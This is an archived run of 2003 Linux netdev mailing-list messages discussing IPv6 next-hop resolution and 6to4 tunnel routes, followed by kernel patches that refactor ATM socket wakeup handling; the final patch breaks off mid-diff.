From pekkas@netcore.fi Mon Jul 14 23:14:29 2003 Received: with ECARTIS (v1.0.0; list netdev); Mon, 14 Jul 2003 23:14:34 -0700 (PDT) Received: from netcore.fi (netcore.fi [193.94.160.1]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6F6ESFl029572 for ; Mon, 14 Jul 2003 23:14:29 -0700 Received: from localhost (pekkas@localhost) by netcore.fi (8.11.6/8.11.6) with ESMTP id h6F6E7I07635; Tue, 15 Jul 2003 09:14:07 +0300 Date: Tue, 15 Jul 2003 09:14:07 +0300 (EEST) From: Pekka Savola To: kuznet@ms2.inr.ac.ru cc: "David S. Miller" , Subject: Re: 2.4.21+ - IPv6 over IPv4 tunneling b0rked In-Reply-To: <200307142349.DAA06134@dub.inr.ac.ru> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII X-archive-position: 4044 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: pekkas@netcore.fi Precedence: bulk X-list: netdev On Tue, 15 Jul 2003 kuznet@ms2.inr.ac.ru wrote: > > Alexey, please add some sanity to this discussion. > > It is about anycast addresses, I maybe not competent here. > I have no idea what is purpose of all-routers anycast. > > However, my modest opinion is here: > > IN NO WAY ANYCAST ADDRESSES MAY BE USED AS NEXTHOP ADDRESSES. > NEXTHOP ADDRESS IS THE ADDRESS WHICH IS EXPECTED TO BE SOURCE OF REDIRECT > MESSAGES ET AL. ANYCAST ADDRESSES ARE INVALID AS SOURCE, HENCE... Modestly, I disagree. You just can't get away from the requirement of having be able to "resolve" next-hops. I.e., the requirement that the users/protocols will give you non-final nexthop information which you have to "resolve" to get the final nexthop (e.g. a global address -> a link-local address obtained using Neighbor Discovery). You want to avoid that: simple IPv4 routers can, but IPv6 in particular, as it implements different scopes which are used extensively especially with Neighbor Discovery, can't really live without it. 
I'm not sure about the level of complexity resolvable next-hops cause, but it shouldn't be huge. The tricky part where proprietary vendors often break are the cases when the "global nexthop" changes but the mapping to the resolved nexthop is not updated. -- Pekka Savola "You each name yourselves king, yet the Netcore Oy kingdom bleeds." Systems. Networks. Security. -- George R.R. Martin: A Clash of Kings From pekkas@netcore.fi Mon Jul 14 23:28:28 2003 Received: with ECARTIS (v1.0.0; list netdev); Mon, 14 Jul 2003 23:28:39 -0700 (PDT) Received: from netcore.fi (netcore.fi [193.94.160.1]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6F6SRFl030051 for ; Mon, 14 Jul 2003 23:28:28 -0700 Received: from localhost (pekkas@localhost) by netcore.fi (8.11.6/8.11.6) with ESMTP id h6F6SCP07714; Tue, 15 Jul 2003 09:28:12 +0300 Date: Tue, 15 Jul 2003 09:28:11 +0300 (EEST) From: Pekka Savola To: kuznet@ms2.inr.ac.ru cc: "David S. Miller" , , Subject: Re: Fw: [PATCH] IPv6: Allow 6to4 routes with SIT In-Reply-To: <200307142329.DAA06071@dub.inr.ac.ru> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII X-archive-position: 4045 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: pekkas@netcore.fi Precedence: bulk X-list: netdev On Tue, 15 Jul 2003 kuznet@ms2.inr.ac.ru wrote: > > Hey guys, even though yoshfuji is away I don't see any > > reason why I shouldn't apply the patch below to both > > 2.4.x and 2.5.x. It looks very uncontroversial to me. > > > > Any objections? > > I would wait for experts. > > Technically IPv6 does not allow use of non-link-local address > as nexthop address, because nexthop address is expected to be unique > for router. 
I think we have two choices here: 1) modify /sbin/ip and /sbin/route (and the rest if any) so that they'll parse global next-hop information and resolve it for the kernel, and report the resolved information to the kernel (see the other thread) 2) the kernel supports "must-resolve" next-hops. > Use of IPv4-COMPAT format for tunnels was a hack to make use of tunnel more > handly, it just a tricky way to encapsulate an IPv4 address inside > IPv6 one, it has nothing to do with _real_ IPv4-COMPAT addresses, > (though logically IPv4-COMPAT addresses _are_ really link-local > for 6over4 "network") it is just an element of our API. Use of 6of4 address > is very strange idea in this context, it does not contradict to anything, > of course, but it looks utterly stupid: 6to4 is a complicated format, where > information about nexthop is encoded in an inapproriate way. > The questions sort of: "What the hell? I do a route with nexthop > 2002:x:y::a:b and a:b disappears somewhere." And the question is right, > because plain logic requires to use a:b as meaningful part of nexthop, > it is the part which provides node _identity_, x:y is just routing information, > identifying particullar "6to4" network, it is meaningless when used > as a nexthop address. Apart from architectural purity (I agree it's messy), I think the practical situation is rather simple: for the case of a:b in 6to4, they're always irrelevant. They always refer to the same next-hop whatever information you'll put in there, the implementations won't care (because as a next-hop, it's just a way of saying "the router at address 2002:V4ADDR". Note that nothing _prevents_ you from treating a:b in 2002:x:y::a:b as a meaningful part of the nexthop. They'll just always refer to the same node for whatever a:b you use. Note that the prefix length of 2002:x:y::a:b is /16 -- you should really rewrite your next-hop considerations with s/a:b/x:y::a:b/. 
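
The point about a:b being irrelevant can be illustrated with a small sketch. It assumes the usual 6to4 layout (2002:V4ADDR::/48, with the IPv4 address in bytes 2..5 of the IPv6 address); the function names are hypothetical and this is not the kernel's SIT code.

```c
#include <assert.h>
#include <stdint.h>
#include <string.h>

/* If addr lies in 2002::/16, copy the embedded IPv4 address (network
 * byte order) into v4 and return 1; otherwise return 0. */
static int sixto4_v4addr(const uint8_t addr[16], uint8_t v4[4])
{
    assert(addr != NULL && v4 != NULL);
    if (addr[0] != 0x20 || addr[1] != 0x02)
        return 0;
    memcpy(v4, addr + 2, 4);
    return 1;
}

/* Two 6to4 next hops name the same router when their embedded IPv4
 * addresses match; the remaining 80 bits (including a:b) are ignored. */
static int sixto4_same_router(const uint8_t a[16], const uint8_t b[16])
{
    uint8_t va[4], vb[4];

    if (!sixto4_v4addr(a, va) || !sixto4_v4addr(b, vb))
        return 0;
    return memcmp(va, vb, 4) == 0;
}
```

Under that assumption, 2002:c000:0201:: and 2002:c000:0201::a both resolve to 192.0.2.1, which is why the low bits make no difference when the address is used as a next hop.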
I think the problem for of implementation is that "6to4" technique has just been hacked in (but quite nicely). It's a bit, but not much, more special than that IMO. -- Pekka Savola "You each name yourselves king, yet the Netcore Oy kingdom bleeds." Systems. Networks. Security. -- George R.R. Martin: A Clash of Kings From yoshfuji@linux-ipv6.org Mon Jul 14 23:58:01 2003 Received: with ECARTIS (v1.0.0; list netdev); Mon, 14 Jul 2003 23:58:12 -0700 (PDT) Received: from yue.hongo.wide.ad.jp (yue.hongo.wide.ad.jp [203.178.139.94]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6F6vxFl030841 for ; Mon, 14 Jul 2003 23:58:00 -0700 Received: from localhost (localhost [127.0.0.1]) by yue.hongo.wide.ad.jp (8.12.3+3.5Wbeta/8.12.3/Debian-5) with ESMTP id h6F6xUBo012775; Tue, 15 Jul 2003 15:59:30 +0900 Date: Tue, 15 Jul 2003 15:59:30 +0900 (JST) Message-Id: <20030715.155930.65250697.yoshfuji@linux-ipv6.org> To: kuznet@ms2.inr.ac.ru Cc: krkumar@us.ibm.com, davem@redhat.com, netdev@oss.sgi.com, linux-net@vger.kernel.org, yoshfuji@linux-ipv6.org Subject: Re: [PATCH 1/4] Prefix List against 2.5.73 From: YOSHIFUJI Hideaki / =?iso-2022-jp?B?GyRCNUhGIzFRTEAbKEI=?= In-Reply-To: <200307150117.FAA06705@dub.inr.ac.ru> References: <200307150117.FAA06705@dub.inr.ac.ru> Organization: USAGI Project X-URL: http://www.yoshifuji.org/%7Ehideaki/ X-Fingerprint: 90 22 65 EB 1E CF 3A D1 0B DF 80 D8 48 07 F8 94 E0 62 0E EA X-PGP-Key-URL: http://www.yoshifuji.org/%7Ehideaki/hideaki@yoshifuji.org.asc X-Face: "5$Al-.M>NJ%a'@hhZdQm:."qn~PA^gq4o*>iCFToq*bAi#4FRtx}enhuQKz7fNqQz\BYU] $~O_5m-9'}MIs`XGwIEscw;e5b>n"B_?j/AkL~i/MEaZBLP X-Mailer: Mew version 2.2 on Emacs 20.7 / Mule 4.1 (AOI) Mime-Version: 1.0 Content-Type: Text/Plain; charset=us-ascii Content-Transfer-Encoding: 7bit X-archive-position: 4046 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: yoshfuji@linux-ipv6.org Precedence: bulk X-list: netdev In article 
<200307150117.FAA06705@dub.inr.ac.ru> (at Tue, 15 Jul 2003 05:17:53 +0400 (MSD)), kuznet@ms2.inr.ac.ru says: > Hello! > > > inet6_fill_ifaddr (and introduce RTM_IFACEFLAGS). This will be specific to > > IPv6. Are you agreeable to this ? > ... > > + IFA_IFFLAGS, > > What's about ifa_flags? There is some space there, and the things > kept there now: TENTATIVE/DEPRECATED et al. are close relatives > of O/M. Alexey, O/M are not flags for addresses, but for interfaces. I believe we should not mix them up. -- Hideaki YOSHIFUJI @ USAGI Project GPG FP: 9022 65EB 1ECF 3AD1 0BDF 80D8 4807 F894 E062 0EEA From chas@locutus.cmf.nrl.navy.mil Tue Jul 15 05:54:58 2003 Received: with ECARTIS (v1.0.0; list netdev); Tue, 15 Jul 2003 05:55:17 -0700 (PDT) Received: from ginger.cmf.nrl.navy.mil (ginger.cmf.nrl.navy.mil [134.207.10.161]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6FCsuFl012283 for ; Tue, 15 Jul 2003 05:54:57 -0700 Received: from locutus.cmf.nrl.navy.mil (locutus.cmf.nrl.navy.mil [134.207.10.66]) by ginger.cmf.nrl.navy.mil (8.12.7/8.12.7) with ESMTP id h6FCshsG028747; Tue, 15 Jul 2003 08:54:43 -0400 (EDT) Message-Id: <200307151254.h6FCshsG028747@ginger.cmf.nrl.navy.mil> To: davem@redhat.com cc: netdev@oss.sgi.com Subject: [PATCH][ATM] some misc sk-related fixups for atm Reply-To: chas3@users.sourceforge.net Date: Tue, 15 Jul 2003 08:52:15 -0400 From: chas williams X-Spam-Score: () hits=0.5 X-Virus-Scanned: NAI Completed X-Scanned-By: MIMEDefang 2.30 (www . roaringpenguin . com / mimedefang) X-archive-position: 4047 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: chas@cmf.nrl.navy.mil Precedence: bulk X-list: netdev this set does away with a few redundant bits in the struct atm_vcc, in particular .reply and .svc_callback. WAITING becomes a flag instead of overloading sk_err. it also changes the wake_up's to the appropriate sk event. 
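
The first patch below replaces an optional vcc->callback (tested for NULL at every call site) with an sk_state_change handler that is always installed at creation time. A user-space sketch of that pattern, with made-up names (mini_sock, mini_def_wakeup) standing in for the kernel structures, might look like this:

```c
#include <assert.h>
#include <stddef.h>

/* Hypothetical stand-in for struct sock; only what the sketch needs. */
struct mini_sock {
    int wakeups;                               /* counts simulated wake-ups  */
    void (*state_change)(struct mini_sock *);  /* never NULL after init      */
};

/* Default handler, playing the role vcc_def_wakeup() has in the patch. */
static void mini_def_wakeup(struct mini_sock *sk)
{
    sk->wakeups++;
}

/* Install the default at creation so callers never have to test for NULL. */
static void mini_sock_init(struct mini_sock *sk)
{
    assert(sk != NULL);
    sk->wakeups = 0;
    sk->state_change = mini_def_wakeup;
}

/* Event path: an unconditional call replaces "if (cb) cb(obj);". */
static void mini_signal(struct mini_sock *sk)
{
    sk->state_change(sk);
}
```

The sketch leaves out the locking and wait-queue checks that the real vcc_def_wakeup() performs; it only shows why the call sites in signaling.c can drop their NULL tests.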
[atm]: use sk_state_change() and eliminate vcc->callback() # This is a BitKeeper generated patch for the following project: # Project Name: Linux kernel tree # This patch format is intended for GNU patch command version 2.5 or higher. # This patch includes the following deltas: # ChangeSet 1.1360 -> 1.1361 # net/atm/svc.c 1.19 -> 1.20 # net/atm/signaling.c 1.15 -> 1.16 # include/linux/atmdev.h 1.19 -> 1.20 # net/atm/common.c 1.36 -> 1.37 # # The following is the BitKeeper ChangeSet Log # -------------------------------------------- # 03/06/20 chas@relax.cmf.nrl.navy.mil 1.1361 # use sk_state_change() and eliminate vcc->callback() # -------------------------------------------- # diff -Nru a/include/linux/atmdev.h b/include/linux/atmdev.h --- a/include/linux/atmdev.h Mon Jun 23 09:54:19 2003 +++ b/include/linux/atmdev.h Mon Jun 23 09:54:19 2003 @@ -297,7 +297,6 @@ short itf; /* interface number */ struct sockaddr_atmsvc local; struct sockaddr_atmsvc remote; - void (*callback)(struct atm_vcc *vcc); int reply; /* also used by ATMTCP */ /* Multipoint part ------------------------------------------------- */ struct atm_vcc *session; /* session VCC descriptor */ diff -Nru a/net/atm/common.c b/net/atm/common.c --- a/net/atm/common.c Mon Jun 23 09:54:19 2003 +++ b/net/atm/common.c Mon Jun 23 09:54:19 2003 @@ -215,6 +215,14 @@ kfree(sk->sk_protinfo); } + +static void vcc_def_wakeup(struct sock *sk) +{ + read_lock(&sk->sk_callback_lock); + if (sk->sk_sleep && waitqueue_active(sk->sk_sleep)) + wake_up(sk->sk_sleep); + read_unlock(&sk->sk_callback_lock); +} int vcc_create(struct socket *sock, int protocol, int family) { @@ -228,6 +236,7 @@ if (!sk) return -ENOMEM; sock_init_data(NULL, sk); + sk->sk_state_change = vcc_def_wakeup; vcc = atm_sk(sk) = kmalloc(sizeof(*vcc), GFP_KERNEL); if (!vcc) { @@ -238,7 +247,6 @@ memset(vcc, 0, sizeof(*vcc)); vcc->sk = sk; vcc->dev = NULL; - vcc->callback = NULL; memset(&vcc->local,0,sizeof(struct sockaddr_atmsvc)); 
memset(&vcc->remote,0,sizeof(struct sockaddr_atmsvc)); vcc->qos.txtp.max_sdu = 1 << 16; /* for meta VCs */ diff -Nru a/net/atm/signaling.c b/net/atm/signaling.c --- a/net/atm/signaling.c Mon Jun 23 09:54:19 2003 +++ b/net/atm/signaling.c Mon Jun 23 09:54:19 2003 @@ -137,11 +137,8 @@ } vcc->sk->sk_ack_backlog++; skb_queue_tail(&vcc->sk->sk_receive_queue, skb); - if (vcc->callback) { - DPRINTK("waking vcc->sleep 0x%p\n", - &vcc->sleep); - vcc->callback(vcc); - } + DPRINTK("waking vcc->sleep 0x%p\n", &vcc->sleep); + vcc->sk->sk_state_change(vcc->sk); as_indicate_complete: release_sock(vcc->sk); return 0; @@ -159,7 +156,7 @@ (int) msg->type); return -EINVAL; } - if (vcc->callback) vcc->callback(vcc); + vcc->sk->sk_state_change(vcc->sk); dev_kfree_skb(skb); return 0; } diff -Nru a/net/atm/svc.c b/net/atm/svc.c --- a/net/atm/svc.c Mon Jun 23 09:54:19 2003 +++ b/net/atm/svc.c Mon Jun 23 09:54:19 2003 @@ -43,14 +43,6 @@ */ -void svc_callback(struct atm_vcc *vcc) -{ - wake_up(&vcc->sleep); -} - - - - static int svc_shutdown(struct socket *sock,int how) { return 0; @@ -547,7 +539,6 @@ sock->ops = &svc_proto_ops; error = vcc_create(sock, protocol, AF_ATMSVC); if (error) return error; - ATM_SD(sock)->callback = svc_callback; ATM_SD(sock)->local.sas_family = AF_ATMSVC; ATM_SD(sock)->remote.sas_family = AF_ATMSVC; return 0; [atm]: eliminate vcc->sleep in favor of sk->sk_sleep # This is a BitKeeper generated patch for the following project: # Project Name: Linux kernel tree # This patch format is intended for GNU patch command version 2.5 or higher. 
# This patch includes the following deltas: # ChangeSet 1.1361 -> 1.1362 # net/atm/lec.c 1.30 -> 1.31 # net/atm/svc.c 1.20 -> 1.21 # drivers/atm/atmtcp.c 1.11 -> 1.12 # net/atm/signaling.c 1.16 -> 1.17 # net/atm/mpc.c 1.21 -> 1.22 # include/linux/atmdev.h 1.20 -> 1.21 # net/atm/raw.c 1.4 -> 1.5 # net/atm/clip.c 1.18 -> 1.19 # net/atm/common.c 1.37 -> 1.38 # # The following is the BitKeeper ChangeSet Log # -------------------------------------------- # 03/06/23 chas@relax.cmf.nrl.navy.mil 1.1362 # eliminate vcc->sleep # -------------------------------------------- # diff -Nru a/drivers/atm/atmtcp.c b/drivers/atm/atmtcp.c --- a/drivers/atm/atmtcp.c Mon Jun 23 10:58:07 2003 +++ b/drivers/atm/atmtcp.c Mon Jun 23 10:58:07 2003 @@ -66,7 +66,7 @@ *(struct atm_vcc **) &new_msg->vcc = vcc; old_test = test_bit(flag,&vcc->flags); out_vcc->push(out_vcc,skb); - add_wait_queue(&vcc->sleep,&wait); + add_wait_queue(vcc->sk->sk_sleep, &wait); while (test_bit(flag,&vcc->flags) == old_test) { mb(); out_vcc = PRIV(vcc->dev) ? 
PRIV(vcc->dev)->vcc : NULL; @@ -78,7 +78,7 @@ schedule(); } current->state = TASK_RUNNING; - remove_wait_queue(&vcc->sleep,&wait); + remove_wait_queue(vcc->sk->sk_sleep, &wait); return error; } @@ -103,7 +103,7 @@ msg->type); return -EINVAL; } - wake_up(&vcc->sleep); + wake_up(vcc->sk->sk_sleep); return 0; } @@ -257,7 +257,7 @@ walk = atm_sk(s); if (walk->dev != atmtcp_dev) continue; - wake_up(&walk->sleep); + wake_up(walk->sk->sk_sleep); } read_unlock(&vcc_sklist_lock); } diff -Nru a/include/linux/atmdev.h b/include/linux/atmdev.h --- a/include/linux/atmdev.h Mon Jun 23 10:58:07 2003 +++ b/include/linux/atmdev.h Mon Jun 23 10:58:07 2003 @@ -291,7 +291,6 @@ void *dev_data; /* per-device data */ void *proto_data; /* per-protocol data */ struct k_atm_aal_stats *stats; /* pointer to AAL stats group */ - wait_queue_head_t sleep; /* if socket is busy */ struct sock *sk; /* socket backpointer */ /* SVC part --- may move later ------------------------------------- */ short itf; /* interface number */ diff -Nru a/net/atm/clip.c b/net/atm/clip.c --- a/net/atm/clip.c Mon Jun 23 10:58:07 2003 +++ b/net/atm/clip.c Mon Jun 23 10:58:07 2003 @@ -67,7 +67,7 @@ ctrl->ip = ip; atm_force_charge(atmarpd,skb->truesize); skb_queue_tail(&atmarpd->sk->sk_receive_queue, skb); - wake_up(&atmarpd->sleep); + wake_up(atmarpd->sk->sk_sleep); return 0; } diff -Nru a/net/atm/common.c b/net/atm/common.c --- a/net/atm/common.c Mon Jun 23 10:58:07 2003 +++ b/net/atm/common.c Mon Jun 23 10:58:07 2003 @@ -235,7 +235,7 @@ sk = sk_alloc(family, GFP_KERNEL, 1, NULL); if (!sk) return -ENOMEM; - sock_init_data(NULL, sk); + sock_init_data(sock, sk); sk->sk_state_change = vcc_def_wakeup; vcc = atm_sk(sk) = kmalloc(sizeof(*vcc), GFP_KERNEL); @@ -257,8 +257,6 @@ vcc->push_oam = NULL; vcc->vpi = vcc->vci = 0; /* no VCI/VPI yet */ vcc->atm_options = vcc->aal_options = 0; - init_waitqueue_head(&vcc->sleep); - sk->sk_sleep = &vcc->sleep; sk->sk_destruct = vcc_sock_destruct; sock->sk = sk; return 0; @@ -310,7 
+308,7 @@ set_bit(ATM_VF_CLOSE, &vcc->flags); vcc->reply = reply; vcc->sk->sk_err = -reply; - wake_up(&vcc->sleep); + wake_up(vcc->sk->sk_sleep); } @@ -557,7 +555,7 @@ } /* verify_area is done by net/socket.c */ eff = (size+3) & ~3; /* align to word boundary */ - prepare_to_wait(&vcc->sleep, &wait, TASK_INTERRUPTIBLE); + prepare_to_wait(sk->sk_sleep, &wait, TASK_INTERRUPTIBLE); error = 0; while (!(skb = alloc_tx(vcc,eff))) { if (m->msg_flags & MSG_DONTWAIT) { @@ -578,9 +576,9 @@ error = -EPIPE; break; } - prepare_to_wait(&vcc->sleep, &wait, TASK_INTERRUPTIBLE); + prepare_to_wait(sk->sk_sleep, &wait, TASK_INTERRUPTIBLE); } - finish_wait(&vcc->sleep, &wait); + finish_wait(sk->sk_sleep, &wait); if (error) goto out; skb->dev = NULL; /* for paths shared with net_device interfaces */ @@ -605,7 +603,7 @@ unsigned int mask; vcc = ATM_SD(sock); - poll_wait(file,&vcc->sleep,wait); + poll_wait(file, vcc->sk->sk_sleep, wait); mask = 0; if (skb_peek(&vcc->sk->sk_receive_queue)) mask |= POLLIN | POLLRDNORM; diff -Nru a/net/atm/lec.c b/net/atm/lec.c --- a/net/atm/lec.c Mon Jun 23 10:58:07 2003 +++ b/net/atm/lec.c Mon Jun 23 10:58:07 2003 @@ -134,7 +134,7 @@ priv = (struct lec_priv *)dev->priv; atm_force_charge(priv->lecd, skb2->truesize); skb_queue_tail(&priv->lecd->sk->sk_receive_queue, skb2); - wake_up(&priv->lecd->sleep); + wake_up(priv->lecd->sk->sk_sleep); } return; @@ -513,7 +513,7 @@ memcpy(skb2->data, mesg, sizeof(struct atmlec_msg)); atm_force_charge(priv->lecd, skb2->truesize); skb_queue_tail(&priv->lecd->sk->sk_receive_queue, skb2); - wake_up(&priv->lecd->sleep); + wake_up(priv->lecd->sk->sk_sleep); } if (f != NULL) br_fdb_put_hook(f); #endif /* defined(CONFIG_BRIDGE) || defined(CONFIG_BRIDGE_MODULE) */ @@ -598,13 +598,13 @@ atm_force_charge(priv->lecd, skb->truesize); skb_queue_tail(&priv->lecd->sk->sk_receive_queue, skb); - wake_up(&priv->lecd->sleep); + wake_up(priv->lecd->sk->sk_sleep); if (data != NULL) { DPRINTK("lec: about to send %d bytes of data\n", 
data->len); atm_force_charge(priv->lecd, data->truesize); skb_queue_tail(&priv->lecd->sk->sk_receive_queue, data); - wake_up(&priv->lecd->sleep); + wake_up(priv->lecd->sk->sk_sleep); } return 0; @@ -686,7 +686,7 @@ if (memcmp(skb->data, lec_ctrl_magic, 4) ==0) { /* Control frame, to daemon*/ DPRINTK("%s: To daemon\n",dev->name); skb_queue_tail(&vcc->sk->sk_receive_queue, skb); - wake_up(&vcc->sleep); + wake_up(vcc->sk->sk_sleep); } else { /* Data frame, queue to protocol handlers */ unsigned char *dst; diff -Nru a/net/atm/mpc.c b/net/atm/mpc.c --- a/net/atm/mpc.c Mon Jun 23 10:58:07 2003 +++ b/net/atm/mpc.c Mon Jun 23 10:58:07 2003 @@ -669,7 +669,7 @@ dprintk("mpoa: (%s) mpc_push: control packet arrived\n", dev->name); /* Pass control packets to daemon */ skb_queue_tail(&vcc->sk->sk_receive_queue, skb); - wake_up(&vcc->sleep); + wake_up(vcc->sk->sk_sleep); return; } @@ -947,7 +947,7 @@ memcpy(skb->data, mesg, sizeof(struct k_message)); atm_force_charge(mpc->mpoad_vcc, skb->truesize); skb_queue_tail(&mpc->mpoad_vcc->sk->sk_receive_queue, skb); - wake_up(&mpc->mpoad_vcc->sleep); + wake_up(mpc->mpoad_vcc->sk->sk_sleep); return 0; } @@ -1226,7 +1226,7 @@ atm_force_charge(vcc, skb->truesize); skb_queue_tail(&vcc->sk->sk_receive_queue, skb); - wake_up(&vcc->sleep); + wake_up(vcc->sk->sk_sleep); dprintk("mpoa: purge_egress_shortcut: exiting:\n"); return; diff -Nru a/net/atm/raw.c b/net/atm/raw.c --- a/net/atm/raw.c Mon Jun 23 10:58:07 2003 +++ b/net/atm/raw.c Mon Jun 23 10:58:07 2003 @@ -29,7 +29,7 @@ { if (skb) { skb_queue_tail(&vcc->sk->sk_receive_queue, skb); - wake_up(&vcc->sleep); + wake_up(vcc->sk->sk_sleep); } } @@ -40,7 +40,7 @@ skb->truesize); atomic_sub(skb->truesize, &vcc->sk->sk_wmem_alloc); dev_kfree_skb_any(skb); - wake_up(&vcc->sleep); + wake_up(vcc->sk->sk_sleep); } diff -Nru a/net/atm/signaling.c b/net/atm/signaling.c --- a/net/atm/signaling.c Mon Jun 23 10:58:07 2003 +++ b/net/atm/signaling.c Mon Jun 23 10:58:07 2003 @@ -61,7 +61,7 @@ #endif 
atm_force_charge(sigd,skb->truesize); skb_queue_tail(&sigd->sk->sk_receive_queue,skb); - wake_up(&sigd->sleep); + wake_up(sigd->sk->sk_sleep); } @@ -137,7 +137,7 @@ } vcc->sk->sk_ack_backlog++; skb_queue_tail(&vcc->sk->sk_receive_queue, skb); - DPRINTK("waking vcc->sleep 0x%p\n", &vcc->sleep); + DPRINTK("waking vcc->sk->sk_sleep 0x%p\n", vcc->sk->sk_sleep); vcc->sk->sk_state_change(vcc->sk); as_indicate_complete: release_sock(vcc->sk); @@ -204,7 +204,7 @@ set_bit(ATM_VF_RELEASED,&vcc->flags); vcc->reply = -EUNATCH; vcc->sk->sk_err = EUNATCH; - wake_up(&vcc->sleep); + wake_up(vcc->sk->sk_sleep); } } diff -Nru a/net/atm/svc.c b/net/atm/svc.c --- a/net/atm/svc.c Mon Jun 23 10:58:07 2003 +++ b/net/atm/svc.c Mon Jun 23 10:58:07 2003 @@ -56,13 +56,13 @@ DPRINTK("svc_disconnect %p\n",vcc); if (test_bit(ATM_VF_REGIS,&vcc->flags)) { - prepare_to_wait(&vcc->sleep, &wait, TASK_UNINTERRUPTIBLE); + prepare_to_wait(vcc->sk->sk_sleep, &wait, TASK_UNINTERRUPTIBLE); sigd_enq(vcc,as_close,NULL,NULL,NULL); while (!test_bit(ATM_VF_RELEASED,&vcc->flags) && sigd) { schedule(); - prepare_to_wait(&vcc->sleep, &wait, TASK_UNINTERRUPTIBLE); + prepare_to_wait(vcc->sk->sk_sleep, &wait, TASK_UNINTERRUPTIBLE); } - finish_wait(&vcc->sleep, &wait); + finish_wait(vcc->sk->sk_sleep, &wait); } /* beware - socket is still in use by atmsigd until the last as_indicate has been answered */ @@ -138,13 +138,13 @@ } vcc->local = *addr; vcc->reply = WAITING; - prepare_to_wait(&vcc->sleep, &wait, TASK_UNINTERRUPTIBLE); + prepare_to_wait(sk->sk_sleep, &wait, TASK_UNINTERRUPTIBLE); sigd_enq(vcc,as_bind,NULL,NULL,&vcc->local); while (vcc->reply == WAITING && sigd) { schedule(); - prepare_to_wait(&vcc->sleep, &wait, TASK_UNINTERRUPTIBLE); + prepare_to_wait(sk->sk_sleep, &wait, TASK_UNINTERRUPTIBLE); } - finish_wait(&vcc->sleep, &wait); + finish_wait(sk->sk_sleep, &wait); clear_bit(ATM_VF_REGIS,&vcc->flags); /* doesn't count */ if (!sigd) { error = -EUNATCH; @@ -219,10 +219,10 @@ } vcc->remote = *addr; vcc->reply 
= WAITING; - prepare_to_wait(&vcc->sleep, &wait, TASK_INTERRUPTIBLE); + prepare_to_wait(sk->sk_sleep, &wait, TASK_INTERRUPTIBLE); sigd_enq(vcc,as_connect,NULL,NULL,&vcc->remote); if (flags & O_NONBLOCK) { - finish_wait(&vcc->sleep, &wait); + finish_wait(sk->sk_sleep, &wait); sock->state = SS_CONNECTING; error = -EINPROGRESS; goto out; @@ -231,7 +231,7 @@ while (vcc->reply == WAITING && sigd) { schedule(); if (!signal_pending(current)) { - prepare_to_wait(&vcc->sleep, &wait, TASK_INTERRUPTIBLE); + prepare_to_wait(sk->sk_sleep, &wait, TASK_INTERRUPTIBLE); continue; } DPRINTK("*ABORT*\n"); @@ -249,13 +249,13 @@ */ sigd_enq(vcc,as_close,NULL,NULL,NULL); while (vcc->reply == WAITING && sigd) { - prepare_to_wait(&vcc->sleep, &wait, TASK_INTERRUPTIBLE); + prepare_to_wait(sk->sk_sleep, &wait, TASK_INTERRUPTIBLE); schedule(); } if (!vcc->reply) while (!test_bit(ATM_VF_RELEASED,&vcc->flags) && sigd) { - prepare_to_wait(&vcc->sleep, &wait, TASK_INTERRUPTIBLE); + prepare_to_wait(sk->sk_sleep, &wait, TASK_INTERRUPTIBLE); schedule(); } clear_bit(ATM_VF_REGIS,&vcc->flags); @@ -265,7 +265,7 @@ error = -EINTR; break; } - finish_wait(&vcc->sleep, &wait); + finish_wait(sk->sk_sleep, &wait); if (error) goto out; if (!sigd) { @@ -312,13 +312,13 @@ goto out; } vcc->reply = WAITING; - prepare_to_wait(&vcc->sleep, &wait, TASK_UNINTERRUPTIBLE); + prepare_to_wait(sk->sk_sleep, &wait, TASK_UNINTERRUPTIBLE); sigd_enq(vcc,as_listen,NULL,NULL,&vcc->local); while (vcc->reply == WAITING && sigd) { schedule(); - prepare_to_wait(&vcc->sleep, &wait, TASK_UNINTERRUPTIBLE); + prepare_to_wait(sk->sk_sleep, &wait, TASK_UNINTERRUPTIBLE); } - finish_wait(&vcc->sleep, &wait); + finish_wait(sk->sk_sleep, &wait); if (!sigd) { error = -EUNATCH; goto out; @@ -354,7 +354,7 @@ while (1) { DEFINE_WAIT(wait); - prepare_to_wait(&old_vcc->sleep, &wait, TASK_INTERRUPTIBLE); + prepare_to_wait(old_vcc->sk->sk_sleep, &wait, TASK_INTERRUPTIBLE); while (!(skb = skb_dequeue(&old_vcc->sk->sk_receive_queue)) && sigd) { if 
(test_bit(ATM_VF_RELEASED,&old_vcc->flags)) break; @@ -373,9 +373,9 @@ error = -ERESTARTSYS; break; } - prepare_to_wait(&old_vcc->sleep, &wait, TASK_INTERRUPTIBLE); + prepare_to_wait(old_vcc->sk->sk_sleep, &wait, TASK_INTERRUPTIBLE); } - finish_wait(&old_vcc->sleep, &wait); + finish_wait(old_vcc->sk->sk_sleep, &wait); if (error) goto out; if (!skb) { @@ -400,15 +400,15 @@ } /* wait should be short, so we ignore the non-blocking flag */ new_vcc->reply = WAITING; - prepare_to_wait(&new_vcc->sleep, &wait, TASK_UNINTERRUPTIBLE); + prepare_to_wait(new_vcc->sk->sk_sleep, &wait, TASK_UNINTERRUPTIBLE); sigd_enq(new_vcc,as_accept,old_vcc,NULL,NULL); while (new_vcc->reply == WAITING && sigd) { release_sock(sk); schedule(); lock_sock(sk); - prepare_to_wait(&new_vcc->sleep, &wait, TASK_UNINTERRUPTIBLE); + prepare_to_wait(new_vcc->sk->sk_sleep, &wait, TASK_UNINTERRUPTIBLE); } - finish_wait(&new_vcc->sleep, &wait); + finish_wait(new_vcc->sk->sk_sleep, &wait); if (!sigd) { error = -EUNATCH; goto out; @@ -444,14 +444,14 @@ DEFINE_WAIT(wait); vcc->reply = WAITING; - 